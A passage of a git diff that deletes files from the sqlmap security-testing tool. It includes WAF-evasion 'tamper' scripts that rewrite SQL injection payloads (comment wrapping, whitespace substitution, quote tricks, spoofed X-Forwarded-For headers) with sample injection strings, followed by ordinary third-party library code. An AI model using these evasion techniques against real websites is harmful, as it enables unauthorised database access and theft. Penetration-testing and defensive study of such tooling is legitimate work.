- singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) - -def tamper(payload, **kwargs): - """ - Replaces space character (' ') with a dash comment ('--') followed by - a new line ('\n') - - Requirement: - * MySQL - * MSSQL - - Tested against: - - Notes: - * Useful to bypass several web application firewalls. - - >>> tamper('1 AND 9227=9227') - '1--%0AAND--%0A9227=9227' - """ - - retVal = "" - - if payload: - for i in xrange(len(payload)): - if payload[i].isspace(): - retVal += "--%0A" - elif payload[i] == '#' or payload[i:i + 3] == '-- ': - retVal += payload[i:] - break - else: - retVal += payload[i] - - return retVal diff --git a/tamper/space2plus.py b/tamper/space2plus.py deleted file mode 100644 index 2f627cad..00000000 --- a/tamper/space2plus.py +++ /dev/null @@ -1,53 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOW - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces space character (' ') with plus ('+') - - Notes: - * Is this any useful? The plus get's url-encoded by sqlmap engine - invalidating the query afterwards - * This tamper script works against all databases - - >>> tamper('SELECT id FROM users') - 'SELECT+id+FROM+users' - """ - - retVal = payload - - if payload: - retVal = "" - quote, doublequote, firstspace = False, False, False - - for i in xrange(len(payload)): - if not firstspace: - if payload[i].isspace(): - firstspace = True - retVal += "+" - continue - - elif payload[i] == '\'': - quote = not quote - - elif payload[i] == '"': - doublequote = not doublequote - - elif payload[i] == " " and not doublequote and not quote: - retVal += "+" - continue - - retVal += payload[i] - - return retVal diff --git a/tamper/space2randomblank.py b/tamper/space2randomblank.py deleted file mode 100644 index e046501a..00000000 --- a/tamper/space2randomblank.py +++ /dev/null @@ -1,67 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import random - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOW - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces space character (' ') with a random blank character from a - valid set of alternate characters - - Tested against: - * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 - * Oracle 10g - * PostgreSQL 8.3, 8.4, 9.0 - - Notes: - * Useful to bypass several web application firewalls - - >>> random.seed(0) - >>> tamper('SELECT id FROM users') - 'SELECT%0Did%0DFROM%0Ausers' - """ - - # ASCII table: - # TAB 09 horizontal TAB - # LF 0A new line - # FF 0C new page - # CR 0D carriage return - blanks = ("%09", "%0A", "%0C", "%0D") - retVal = payload - - if payload: - retVal = "" - quote, doublequote, firstspace = False, False, False - - for i in xrange(len(payload)): - if not firstspace: - if payload[i].isspace(): - firstspace = True - retVal += random.choice(blanks) - continue - - elif payload[i] == '\'': - quote = not quote - - elif payload[i] == '"': - doublequote = not doublequote - - elif payload[i] == ' ' and not doublequote and not quote: - retVal += random.choice(blanks) - continue - - retVal += payload[i] - - return retVal diff --git a/tamper/symboliclogical.py b/tamper/symboliclogical.py deleted file mode 100644 index e0c6af27..00000000 --- a/tamper/symboliclogical.py +++ /dev/null @@ -1,30 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOWEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) - - >>> tamper("1 AND '1'='1") - "1 %26%26 '1'='1" - """ - - retVal = payload - - if payload: - retVal = re.sub(r"(?i)\bAND\b", "%26%26", re.sub(r"(?i)\bOR\b", "%7C%7C", payload)) - - return retVal diff --git a/tamper/unionalltounion.py b/tamper/unionalltounion.py deleted file mode 100644 index 67062177..00000000 --- a/tamper/unionalltounion.py +++ /dev/null @@ -1,23 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.HIGHEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces UNION ALL SELECT with UNION SELECT - - >>> tamper('-1 UNION ALL SELECT') - '-1 UNION SELECT' - """ - - return payload.replace("UNION ALL SELECT", "UNION SELECT") if payload else payload diff --git a/tamper/unmagicquotes.py b/tamper/unmagicquotes.py deleted file mode 100644 index af488772..00000000 --- a/tamper/unmagicquotes.py +++ /dev/null @@ -1,53 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces quote character (') with a multi-byte combo %bf%27 together with - generic comment at the end (to make it work) - - Notes: - * Useful for bypassing magic_quotes/addslashes feature - - Reference: - * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string - - >>> tamper("1' AND 1=1") - '1%bf%27-- ' - """ - - retVal = payload - - if payload: - found = False - retVal = "" - - for i in xrange(len(payload)): - if payload[i] == '\'' and not found: - retVal += "%bf%27" - found = True - else: - retVal += payload[i] - continue - - if found: - _ = re.sub(r"(?i)\s*(AND|OR)[\s(]+([^\s]+)\s*(=|LIKE)\s*\2", "", retVal) - if _ != retVal: - retVal = _ - retVal += "-- " - elif not any(_ in retVal for _ in ('#', '--', '/*')): - retVal += "-- " - return retVal diff --git a/tamper/uppercase.py b/tamper/uppercase.py deleted file mode 100644 index 5169488f..00000000 --- a/tamper/uppercase.py +++ /dev/null @@ -1,46 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.data import kb -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces each keyword character with upper case value - - Tested against: - * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 - * Oracle 10g - * PostgreSQL 8.3, 8.4, 9.0 - - Notes: - * Useful to bypass very weak and bespoke web application firewalls - that has poorly written permissive regular expressions - * This tamper script should work against all (?) databases - - >>> tamper('insert') - 'INSERT' - """ - - retVal = payload - - if payload: - for match in re.finditer(r"[A-Za-z_]+", retVal): - word = match.group() - - if word.upper() in kb.keywords: - retVal = retVal.replace(word, word.upper()) - - return retVal diff --git a/tamper/varnish.py b/tamper/varnish.py deleted file mode 100644 index 5a3d4e83..00000000 --- a/tamper/varnish.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Append a HTTP header 'X-originating-IP' to bypass - WAF Protection of Varnish Firewall - - Notes: - Reference: http://h30499.www3.hp.com/t5/Fortify-Application-Security/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366 - - Examples: - >> X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X) - >> X-remote-IP: TARGET_PROXY_IP (184.189.250.X) - >> X-originating-IP: TARGET_LOCAL_IP (127.0.0.1) - >> x-remote-addr: TARGET_INTERNALUSER_IP (192.168.1.X) - >> X-remote-IP: * or %00 or %0A - """ - - headers = kwargs.get("headers", {}) - headers["X-originating-IP"] = "127.0.0.1" - return payload diff --git a/tamper/versionedkeywords.py b/tamper/versionedkeywords.py deleted file mode 100644 index a624b306..00000000 --- a/tamper/versionedkeywords.py +++ /dev/null @@ -1,52 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import re - -from lib.core.common import singleTimeWarnMessage -from lib.core.data import kb -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.HIGHER - -def dependencies(): - singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) - -def tamper(payload, **kwargs): - """ - Encloses each non-function keyword with versioned MySQL comment - - Requirement: - * MySQL - - Tested against: - * MySQL 4.0.18, 5.1.56, 5.5.11 - - Notes: - * Useful to bypass several web application firewalls when the - back-end database management system is MySQL - - >>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#') - '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#' - """ - - def process(match): - word = match.group('word') - if word.upper() in kb.keywords: - return match.group().replace(word, "/*!%s*/" % word) - else: - return match.group() - - retVal = payload - - if payload: - retVal = re.sub(r"(?<=\W)(?P[A-Za-z_]+)(?=[^\w(]|\Z)", lambda match: process(match), retVal) - retVal = retVal.replace(" /*!", "/*!").replace("*/ ", "*/") - - return retVal diff --git a/tamper/versionedmorekeywords.py b/tamper/versionedmorekeywords.py deleted file mode 100644 index 95f0c2d0..00000000 --- a/tamper/versionedmorekeywords.py +++ /dev/null @@ -1,53 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import re - -from lib.core.common import singleTimeWarnMessage -from lib.core.data import kb -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY -from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS - -__priority__ = PRIORITY.HIGHER - -def dependencies(): - singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s >= 5.1.13" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) - -def tamper(payload, **kwargs): - """ - Encloses each keyword with versioned MySQL comment - - Requirement: - * MySQL >= 5.1.13 - - Tested against: - * MySQL 5.1.56, 5.5.11 - - Notes: - * Useful to bypass several web application firewalls when the - back-end database management system is MySQL - - >>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#') - '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#' - """ - - def process(match): - word = match.group('word') - if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS: - return match.group().replace(word, "/*!%s*/" % word) - else: - return match.group() - - retVal = payload - - if payload: - retVal = re.sub(r"(?<=\W)(?P[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), retVal) - retVal = retVal.replace(" /*!", "/*!").replace("*/ ", "*/") - - return retVal diff --git a/tamper/xforwardedfor.py b/tamper/xforwardedfor.py deleted file mode 100644 index 47a99cd5..00000000 --- a/tamper/xforwardedfor.py +++ /dev/null @@ -1,29 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY -from random import sample -__priority__ = PRIORITY.NORMAL - -def dependencies(): - pass - -def randomIP(): - numbers = [] - while not numbers or numbers[0] in (10, 172, 192): - numbers = sample(xrange(1, 255), 4) - return '.'.join(str(_) for _ in numbers) - -def tamper(payload, **kwargs): - """ - Append a fake HTTP header 'X-Forwarded-For' to bypass - WAF (usually application based) protection - """ - - headers = kwargs.get("headers", {}) - headers["X-Forwarded-For"] = randomIP() - return payload diff --git a/thirdparty/__init__.py b/thirdparty/__init__.py deleted file mode 100644 index e69de29b..00000000 diff --git a/thirdparty/ansistrm/__init__.py b/thirdparty/ansistrm/__init__.py deleted file mode 100644 index e69de29b..00000000 diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py deleted file mode 100644 index 9f3a6c5e..00000000 --- a/thirdparty/ansistrm/ansistrm.py +++ /dev/null @@ -1,158 +0,0 @@ -# -# Copyright (C) 2010-2012 Vinay Sajip. All rights reserved. Licensed under the new BSD license. -# -import logging -import os -import re -import subprocess -import sys - -from lib.core.convert import stdoutencode - -if subprocess.mswindows: - import ctypes - import ctypes.wintypes - - # Reference: https://gist.github.com/vsajip/758430 - # https://github.com/ipython/ipython/issues/4252 - # https://msdn.microsoft.com/en-us/library/windows/desktop/ms686047%28v=vs.85%29.aspx - ctypes.windll.kernel32.SetConsoleTextAttribute.argtypes = [ctypes.wintypes.HANDLE, ctypes.wintypes.WORD] - ctypes.windll.kernel32.SetConsoleTextAttribute.restype = ctypes.wintypes.BOOL - - -class ColorizingStreamHandler(logging.StreamHandler): - # color names to indices - color_map = { - 'black': 0, - 'red': 1, - 'green': 2, - 'yellow': 3, - 'blue': 4, - 'magenta': 5, - 'cyan': 6, - 'white': 7, - } - - # levels to (background, foreground, bold/intense) - level_map = { - logging.DEBUG: (None, 'blue', False), - logging.INFO: (None, 'green', False), - logging.WARNING: (None, 'yellow', False), - logging.ERROR: (None, 'red', False), - logging.CRITICAL: ('red', 'white', False) - } - csi = '\x1b[' - reset = '\x1b[0m' - disable_coloring = False - - @property - def is_tty(self): - isatty = getattr(self.stream, 'isatty', None) - return isatty and isatty() and not self.disable_coloring - - def emit(self, record): - try: - message = stdoutencode(self.format(record)) - stream = self.stream - - if not self.is_tty: - if message and message[0] == "\r": - message = message[1:] - stream.write(message) - else: - self.output_colorized(message) - stream.write(getattr(self, 'terminator', '\n')) - - self.flush() - except (KeyboardInterrupt, SystemExit): - raise - except IOError: - pass - except: - self.handleError(record) - - if not subprocess.mswindows: - def output_colorized(self, message): - self.stream.write(message) - else: - ansi_esc = re.compile(r'\x1b\[((?:\d+)(?:;(?:\d+))*)m') - - nt_color_map = { - 0: 0x00, # black - 1: 0x04, # red - 2: 0x02, # green - 3: 0x06, # yellow - 4: 0x01, # blue - 5: 0x05, # magenta - 6: 0x03, # cyan - 7: 0x07, # white - } - - def output_colorized(self, message): - parts = self.ansi_esc.split(message) - write = self.stream.write - h = None - fd = getattr(self.stream, 'fileno', None) - - if fd is not None: - fd = fd() - - if fd in (1, 2): # stdout or stderr - h = ctypes.windll.kernel32.GetStdHandle(-10 - fd) - - while parts: - text = parts.pop(0) - - if text: - write(text) - - if parts: - params = parts.pop(0) - - if h is not None: - params = [int(p) for p in params.split(';')] - color = 0 - - for p in params: - if 40 <= p <= 47: - color |= self.nt_color_map[p - 40] << 4 - elif 30 <= p <= 37: - color |= self.nt_color_map[p - 30] - elif p == 1: - color |= 0x08 # foreground intensity on - elif p == 0: # reset to default color - color = 0x07 - else: - pass # error condition ignored - - ctypes.windll.kernel32.SetConsoleTextAttribute(h, color) - - def colorize(self, message, record): - if record.levelno in self.level_map and self.is_tty: - bg, fg, bold = self.level_map[record.levelno] - params = [] - - if bg in self.color_map: - params.append(str(self.color_map[bg] + 40)) - - if fg in self.color_map: - params.append(str(self.color_map[fg] + 30)) - - if bold: - params.append('1') - - if params and message: - if message.lstrip() != message: - prefix = re.search(r"\s+", message).group(0) - message = message[len(prefix):] - else: - prefix = "" - - message = "%s%s" % (prefix, ''.join((self.csi, ';'.join(params), - 'm', message, self.reset))) - - return message - - def format(self, record): - message = logging.StreamHandler.format(self, record) - return self.colorize(message, record) diff --git a/thirdparty/beautifulsoup/__init__.py b/thirdparty/beautifulsoup/__init__.py deleted file mode 100644 index 7954a3d0..00000000 --- a/thirdparty/beautifulsoup/__init__.py +++ /dev/null @@ -1,37 +0,0 @@ -#!/usr/bin/env python -# -# Copyright (c) 2004-2010, Leonard Richardson -# -# All rights reserved. -# -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are -# met: -# -# * Redistributions of source code must retain the above copyright -# notice, this list of conditions and the following disclaimer. -# -# * Redistributions in binary form must reproduce the above -# copyright notice, this list of conditions and the following -# disclaimer in the documentation and/or other materials provided -# with the distribution. -# -# * Neither the name of the the Beautiful Soup Consortium and All -# Night Kosher Bakery nor the names of its contributors may be -# used to endorse or promote products derived from this software -# without specific prior written permission. -# -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR -# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, -# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, -# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR -# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF -# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING -# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE, DAMMIT. -# - -pass diff --git a/thirdparty/beautifulsoup/beautifulsoup.py b/thirdparty/beautifulsoup/beautifulsoup.py deleted file mode 100644 index 69d3752c..00000000 --- a/thirdparty/beautifulsoup/beautifulsoup.py +++ /dev/null @@ -1,2017 +0,0 @@ -"""Beautiful Soup -Elixir and Tonic -"The Screen-Scraper's Friend" -http://www.crummy.com/software/BeautifulSoup/ - -Beautiful Soup parses a (possibly invalid) XML or HTML document into a -tree representation. It provides methods and Pythonic idioms that make -it easy to navigate, search, and modify the tree. - -A well-formed XML/HTML document yields a well-formed data -structure. An ill-formed XML/HTML document yields a correspondingly -ill-formed data structure. If your document is only locally -well-formed, you can use this library to find and process the -well-formed part of it. - -Beautiful Soup works with Python 2.2 and up. It has no external -dependencies, but you'll have more success at converting data to UTF-8 -if you also install these three packages: - -* chardet, for auto-detecting character encodings - http://chardet.feedparser.org/ -* cjkcodecs and iconv_codec, which add more encodings to the ones supported - by stock Python. - http://cjkpython.i18n.org/ - -Beautiful Soup defines classes for two main parsing strategies: - - * BeautifulStoneSoup, for parsing XML, SGML, or your domain-specific - language that kind of looks like XML. - - * BeautifulSoup, for parsing run-of-the-mill HTML code, be it valid - or invalid. This class has web browser-like heuristics for - obtaining a sensible parse tree in the face of common HTML errors. - -Beautiful Soup also defines a class (UnicodeDammit) for autodetecting -the encoding of an HTML or XML document, and converting it to -Unicode. Much of this code is taken from Mark Pilgrim's Universal Feed Parser. - -For more than you ever wanted to know about Beautiful Soup, see the -documentation: -http://www.crummy.com/software/BeautifulSoup/documentation.html - -Here, have some legalese: - -Copyright (c) 2004-2010, Leonard Richardson - -All rights reserved. - -Redistribution and use in source and binary forms, with or without -modification, are permitted provided that the following conditions are -met: - - * Redistributions of source code must retain the above copyright - notice, this list of conditions and the following disclaimer. - - * Redistributions in binary form must reproduce the above - copyright notice, this list of conditions and the following - disclaimer in the documentation and/or other materials provided - with the distribution. - - * Neither the name of the the Beautiful Soup Consortium and All - Night Kosher Bakery nor the names of its contributors may be - used to endorse or promote products derived from this software - without specific prior written permission. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR -A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, -EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, -PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR -PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF -LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING -NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE, DAMMIT. - -""" -from __future__ import generators - -__author__ = "Leonard Richardson (leonardr@segfault.org)" -__version__ = "3.2.1" -__copyright__ = "Copyright (c) 2004-2012 Leonard Richardson" -__license__ = "New-style BSD" - -from sgmllib import SGMLParser, SGMLParseError -import codecs -import markupbase -import types -import re -import sgmllib -try: - from htmlentitydefs import name2codepoint -except ImportError: - name2codepoint = {} -try: - set -except NameError: - from sets import Set as set - -#These hacks make Beautiful Soup able to parse XML with namespaces -sgmllib.tagfind = re.compile('[a-zA-Z][-_.:a-zA-Z0-9]*') -markupbase._declname_match = re.compile(r'[a-zA-Z][-_.:a-zA-Z0-9]*\s*').match - -DEFAULT_OUTPUT_ENCODING = "utf-8" - -def _match_css_class(str): - """Build a RE to match the given CSS class.""" - return re.compile(r"(^|.*\s)%s($|\s)" % str) - -# First, the classes that represent markup elements. - -class PageElement(object): - """Contains the navigational information for some part of the page - (either a tag or a piece of text)""" - - def _invert(h): - "Cheap function to invert a hash." - i = {} - for k,v in h.items(): - i[v] = k - return i - - XML_ENTITIES_TO_SPECIAL_CHARS = { "apos" : "'", - "quot" : '"', - "amp" : "&", - "lt" : "<", - "gt" : ">" } - - XML_SPECIAL_CHARS_TO_ENTITIES = _invert(XML_ENTITIES_TO_SPECIAL_CHARS) - - def setup(self, parent=None, previous=None): - """Sets up the initial relations between this element and - other elements.""" - self.parent = parent - self.previous = previous - self.next = None - self.previousSibling = None - self.nextSibling = None - if self.parent and self.parent.contents: - self.previousSibling = self.parent.contents[-1] - self.previousSibling.nextSibling = self - - def replaceWith(self, replaceWith): - oldParent = self.parent - myIndex = self.parent.index(self) - if hasattr(replaceWith, "parent")\ - and replaceWith.parent is self.parent: - # We're replacing this element with one of its siblings. - index = replaceWith.parent.index(replaceWith) - if index and index < myIndex: - # Furthermore, it comes before this element. That - # means that when we extract it, the index of this - # element will change. - myIndex = myIndex - 1 - self.extract() - oldParent.insert(myIndex, replaceWith) - - def replaceWithChildren(self): - myParent = self.parent - myIndex = self.parent.index(self) - self.extract() - reversedChildren = list(self.contents) - reversedChildren.reverse() - for child in reversedChildren: - myParent.insert(myIndex, child) - - def extract(self): - """Destructively rips this element out of the tree.""" - if self.parent: - try: - del self.parent.contents[self.parent.index(self)] - except ValueError: - pass - - #Find the two elements that would be next to each other if - #this element (and any children) hadn't been parsed. Connect - #the two. - lastChild = self._lastRecursiveChild() - nextElement = lastChild.next - - if self.previous: - self.previous.next = nextElement - if nextElement: - nextElement.previous = self.previous - self.previous = None - lastChild.next = None - - self.parent = None - if self.previousSibling: - self.previousSibling.nextSibling = self.nextSibling - if self.nextSibling: - self.nextSibling.previousSibling = self.previousSibling - self.previousSibling = self.nextSibling = None - return self - - def _lastRecursiveChild(self): - "Finds the last element beneath this object to be parsed." - lastChild = self - while hasattr(lastChild, 'contents') and lastChild.contents: - lastChild = lastChild.contents[-1] - return lastChild - - def insert(self, position, newChild): - if isinstance(newChild, basestring) \ - and not isinstance(newChild, NavigableString): - newChild = NavigableString(newChild) - - position = min(position, len(self.contents)) - if hasattr(newChild, 'parent') and newChild.parent is not None: - # We're 'inserting' an element that's already one - # of this object's children. - if newChild.parent is self: - index = self.index(newChild) - if index > position: - # Furthermore we're moving it further down the - # list of this object's children. That means that - # when we extract this element, our target index - # will jump down one. - position = position - 1 - newChild.extract() - - newChild.parent = self - previousChild = None - if position == 0: - newChild.previousSibling = None - newChild.previous = self - else: - previousChild = self.contents[position-1] - newChild.previousSibling = previousChild - newChild.previousSibling.nextSibling = newChild - newChild.previous = previousChild._lastRecursiveChild() - if newChild.previous: - newChild.previous.next = newChild - - newChildsLastElement = newChild._lastRecursiveChild() - - if position >= len(self.contents): - newChild.nextSibling = None - - parent = self - parentsNextSibling = None - while not parentsNextSibling: - parentsNextSibling = parent.nextSibling - parent = parent.parent - if not parent: # This is the last element in the document. - break - if parentsNextSibling: - newChildsLastElement.next = parentsNextSibling - else: - newChildsLastElement.next = None - else: - nextChild = self.contents[position] - newChild.nextSibling = nextChild - if newChild.nextSibling: - newChild.nextSibling.previousSibling = newChild - newChildsLastElement.next = nextChild - - if newChildsLastElement.next: - newChildsLastElement.next.previous = newChildsLastElement - self.contents.insert(position, newChild) - - def append(self, tag): - """Appends the given tag to the contents of this tag.""" - self.insert(len(self.contents), tag) - - def findNext(self, name=None, attrs={}, text=None, **kwargs): - """Returns the first item that matches the given criteria and - appears after this Tag in the document.""" - return self._findOne(self.findAllNext, name, attrs, text, **kwargs) - - def findAllNext(self, name=None, attrs={}, text=None, limit=None, - **kwargs): - """Returns all items that match the given criteria and appear - after this Tag in the document.""" - return self._findAll(name, attrs, text, limit, self.nextGenerator, - **kwargs) - - def findNextSibling(self, name=None, attrs={}, text=None, **kwargs): - """Returns the closest sibling to this Tag that matches the - given criteria and appears after this Tag in the document.""" - return self._findOne(self.findNextSiblings, name, attrs, text, - **kwargs) - - def findNextSiblings(self, name=None, attrs={}, text=None, limit=None, - **kwargs): - """Returns the siblings of this Tag that match the given - criteria and appear after this Tag in the document.""" - return self._findAll(name, attrs, text, limit, - self.nextSiblingGenerator, **kwargs) - fetchNextSiblings = findNextSiblings # Compatibility with pre-3.x - - def findPrevious(self, name=None, attrs={}, text=None, **kwargs): - """Returns the first item that matches the given criteria and - appears before this Tag in the document.""" - return self._findOne(self.findAllPrevious, name, attrs, text, **kwargs) - - def findAllPrevious(self, name=None, attrs={}, text=None, limit=None, - **kwargs): - """Returns all items that match the given criteria and appear - before this Tag in the document.""" - return self._findAll(name, attrs, text, limit, self.previousGenerator, - **kwargs) - fetchPrevious = findAllPrevious # Compatibility with pre-3.x - - def findPreviousSibling(self, name=None, attrs={}, text=None, **kwargs): - """Returns the closest sibling to this Tag that matches the - given criteria and appears before this Tag in the document.""" - return self._findOne(self.findPreviousSiblings, name, attrs, text, - **kwargs) - - def findPreviousSiblings(self, name=None, attrs={}, text=None, - limit=None, **kwargs): - """Returns the siblings of this Tag that match the given - criteria and appear before this Tag in the document.""" - return self._findAll(name, attrs, text, limit, - self.previousSiblingGenerator, **kwargs) - fetchPreviousSiblings = findPreviousSiblings # Compatibility with pre-3.x - - def findParent(self, name=None, attrs={}, **kwargs): - """Returns the closest parent of this Tag that matches the given - criteria.""" - # NOTE: We can't use _findOne because findParents takes a different - # set of arguments. - r = None - l = self.findParents(name, attrs, 1) - if l: - r = l[0] - return r - - def findParents(self, name=None, attrs={}, limit=None, **kwargs): - """Returns the parents of this Tag that match the given - criteria.""" - - return self._findAll(name, attrs, None, limit, self.parentGenerator, - **kwargs) - fetchParents = findParents # Compatibility with pre-3.x - - #These methods do the real heavy lifting. - - def _findOne(self, method, name, attrs, text, **kwargs): - r = None - l = method(name, attrs, text, 1, **kwargs) - if l: - r = l[0] - return r - - def _findAll(self, name, attrs, text, limit, generator, **kwargs): - "Iterates over a generator looking for things that match." - - if isinstance(name, SoupStrainer): - strainer = name - # (Possibly) special case some findAll*(...) searches - elif text is None and not limit and not attrs and not kwargs: - # findAll*(True) - if name is True: - return [element for element in generator() - if isinstance(element, Tag)] - # findAll*('tag-name') - elif isinstance(name, basestring): - return [element for element in generator() - if isinstance(element, Tag) and - element.name == name] - else: - strainer = SoupStrainer(name, attrs, text, **kwargs) - # Build a SoupStrainer - else: - strainer = SoupStrainer(name, attrs, text, **kwargs) - results = ResultSet(strainer) - g = generator() - while True: - try: - i = g.next() - except StopIteration: - break - if i: - found = strainer.search(i) - if found: - results.append(found) - if limit and len(results) >= limit: - break - return results - - #These Generators can be used to navigate starting from both - #NavigableStrings and Tags. - def nextGenerator(self): - i = self - while i is not None: - i = i.next - yield i - - def nextSiblingGenerator(self): - i = self - while i is not None: - i = i.nextSibling - yield i - - def previousGenerator(self): - i = self - while i is not None: - i = i.previous - yield i - - def previousSiblingGenerator(self): - i = self - while i is not None: - i = i.previousSibling - yield i - - def parentGenerator(self): - i = self - while i is not None: - i = i.parent - yield i - - # Utility methods - def substituteEncoding(self, str, encoding=None): - encoding = encoding or "utf-8" - return str.replace("%SOUP-ENCODING%", encoding) - - def toEncoding(self, s, encoding=None): - """Encodes an object to a string in some encoding, or to Unicode. - .""" - if isinstance(s, unicode): - if encoding: - s = s.encode(encoding) - elif isinstance(s, str): - if encoding: - s = s.encode(encoding) - else: - s = unicode(s) - else: - if encoding: - s = self.toEncoding(str(s), encoding) - else: - s = unicode(s) - return s - - BARE_AMPERSAND_OR_BRACKET = re.compile("([<>]|" - + "&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)" - + ")") - - def _sub_entity(self, x): - """Used with a regular expression to substitute the - appropriate XML entity for an XML special character.""" - return "&" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + ";" - - -class NavigableString(unicode, PageElement): - - def __new__(cls, value): - """Create a new 